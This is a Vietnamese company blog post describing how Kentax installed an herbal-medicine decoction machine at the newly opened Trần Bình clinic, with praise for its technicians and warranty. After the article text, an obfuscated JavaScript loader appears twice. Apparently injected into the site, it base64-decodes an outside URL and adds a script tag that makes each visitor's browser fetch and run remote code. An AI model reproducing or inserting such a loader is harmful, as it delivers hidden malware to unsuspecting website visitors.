Kentax lắp đặt máy sắc thuốc cho phòng khám đông y Trần Bình của anh Bình

bởi

trong

Vào ngày 1/5, Kentax đã hoàn thành việc lắp đặt máy sắc thuốc cho phòng khám đông y Trần Bình mới thành lập của anh Bình. Được biết đến qua sự giới thiệu của người thân, anh Bình đã tin tưởng và lựa chọn Kentax để trang bị cho phòng khám của mình một chiếc máy sắc thuốc hiện đại và hiệu quả.

Anh Bình chia sẻ rằng phòng khám đông y của anh đang cần một giải pháp sắc thuốc và đóng gói hiệu quả để phục vụ tốt nhất cho bệnh nhân. Sau khi tìm hiểu, anh quyết định chọn máy sắc thuốc của Kentax vì sản phẩm không chỉ có giá cả phải chăng mà còn đáp ứng đầy đủ nhu cầu của anh về hiệu suất và chất lượng.

Quá trình lắp đặt máy diễn ra suôn sẻ tại phòng khám của anh Bình. Đội ngũ kỹ thuật viên của Kentax đã thể hiện sự chuyên nghiệp và tận tâm trong từng công đoạn lắp đặt.

Sự chu đáo và cẩn thận của họ đã để lại ấn tượng sâu sắc cho anh Bình. Anh rất hài lòng với dịch vụ và sự hỗ trợ nhiệt tình từ Kentax.

Kentax cam kết tiếp tục đồng hành cùng anh Bình trong quá trình sử dụng máy với chính sách bảo hành 12 tháng và hỗ trợ kỹ thuật tận tình. Sự hài lòng của khách hàng là động lực để Kentax không ngừng hoàn thiện và phát triển.

Chúc anh Bình và phòng khám đông y Trần Bình ngày càng phát triển và thành công!

(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();

Bình luận

Để lại một bình luận

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *